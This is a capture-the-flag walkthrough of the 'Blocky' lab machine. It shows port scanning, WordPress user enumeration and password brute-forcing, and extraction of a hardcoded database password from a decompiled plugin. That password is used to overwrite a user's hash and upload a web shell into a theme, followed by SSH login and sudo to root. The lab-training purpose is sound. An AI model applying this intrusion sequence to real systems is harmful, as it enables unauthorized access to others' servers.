Blocky

July 30th, 2020

Blocky logo

This is an easy linux box

Tools used

  • ffuf
  • hashcat
  • nmap
  • ssh
  • sudo
  • wget
  • wpscan

Reconnaissance

Nmap

nmap -sC -sV -oA blocky 10.10.10.37 -v

PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Here’s what nmap teaches us :

  • port 22 (FTP) - ProFTPD 1.3.5a
  • port 22 (SSH) - OpenSSH 7.2p2
  • port 80 (HTTP) - Apache 2.4.18

Let’s first go to the web port :

Blocky website

It looks like a website about a minecraft server, the website is still in “construction” and a wiki is in development. Let’ try to found files/directories :

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.37/FUZZ -e .txt,.php -t 150         

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.37/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

index.php               [Status: 301, Size: 0, Words: 1, Lines: 1]
wiki                    [Status: 301, Size: 309, Words: 20, Lines: 10]
wp-content              [Status: 301, Size: 315, Words: 20, Lines: 10]
wp-login.php            [Status: 200, Size: 2402, Words: 147, Lines: 70]
plugins                 [Status: 301, Size: 312, Words: 20, Lines: 10]
license.txt             [Status: 200, Size: 19935, Words: 3334, Lines: 386]
wp-includes             [Status: 301, Size: 316, Words: 20, Lines: 10]
javascript              [Status: 301, Size: 315, Words: 20, Lines: 10]
wp-trackback.php        [Status: 200, Size: 135, Words: 11, Lines: 5]
wp-admin                [Status: 301, Size: 313, Words: 20, Lines: 10]
phpmyadmin              [Status: 301, Size: 315, Words: 20, Lines: 10]
wp-signup.php           [Status: 302, Size: 0, Words: 1, Lines: 1]

So this is a Wordpress. To found the version, I went to this url :

Wordpress version

This is not the last Wordpress version, I used wpscan to get more informations about it :

wpscan --rua -e --url http://10.10.10.37/

The one interesting thing that I get from this scan is a username :

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

I tried to brute force it :

wpscan --rua --url http://10.10.10.37/ -P /home/liodeus/wordlist/rockyou.txt -U "notch"

But, couldn’t found the password ! Let’s try another path and see if I can do anything else. They were talking about a wiki, so let’s see it :

Wiki page

So they’re talking about plugins and ffuf found a plugins directory :

Plugins page

There is two plugins, download them :

wget http://10.10.10.37/plugins/files/griefprevention-1.11.2-3.1.1.298.jar
wget http://10.10.10.37/plugins/files/BlockyCore.jar

This is two java files, looking on Google how to decompile them, I stumble upon this website : http://www.javadecompilers.com/, that I used to decompiled both files. The interesting one was “BlockyCore.jar” :

Java decompilers

And here I obtained credentials to the database !

this.sqlHost = "localhost";
this.sqlUser = "root";
this.sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

Exploit

From ffuf, I know that there is a phpmyadmin, so go connect to it with the credentials :

Phpmyadmin connected

Now that I’m connected, I see the wordpress database and I’m interested in passwords. So I went to wordpress > wp_users > notch hashed password.

Notch hashed password

I tried to crack it with hashcat :

hashcat.exe -m 400 -a 0 hash.txt rockyou.txt

But no success ! So I thought, what if I just change the hashed password by mine ? I found this website who let’s us generate hashed password from a string : https://ehikioya.com/wordpress-password-hash-generator/. So I hashed “Liodeus”, which gives me this :

Liodeus -> $P$BRdSf.4WMEer/JWPQPIZMrtLGHkL/e0

Now let’s modify the hashed password of notch by mine :

Hash modified

Then go try to connect : http://10.10.10.37/wp-admin/

notch:Liodeus

Wordpress login

And here I’m connected at the Wordpress backend ! Now I’ll upload a webshell, there is mutliple ways to do it : https://hackingnewideas.wordpress.com/2014/01/02/how-to-upload-shell-in-wordpress-sites/. I used the first one : Appearance > Editor > 404 Template, modified with https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php :

Webshell upload

Then go to the url of the modified theme :

Webshell exemple

I’m only “www-data” ! There is another method who let you connect as notch. Remembering that there is the SSH port open, I tried to connect as notch with the same password as the one from the database (8YsqfCTnvxAUeduzjNSXe22) :

ssh notch@10.10.10.37              
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$ whoami
notch

And there I’m connected as notch ! First things that I do is to check if notch can run commands as another person :

notch@Blocky:/home/notch$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Notch can run any commands as root ! So let’s get root !

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# whoami
root

And here I’m root ! Now go read the flags.

Flags

User.txt

root@Blocky:/home/notch# cat user.txt 
59fee0977fb60b8a0bc6e41e751f3cd5

Root.txt

root@Blocky:/home/notch# cat /root/root.txt 
0a9694a5b4d272c694679f7860f1cd5f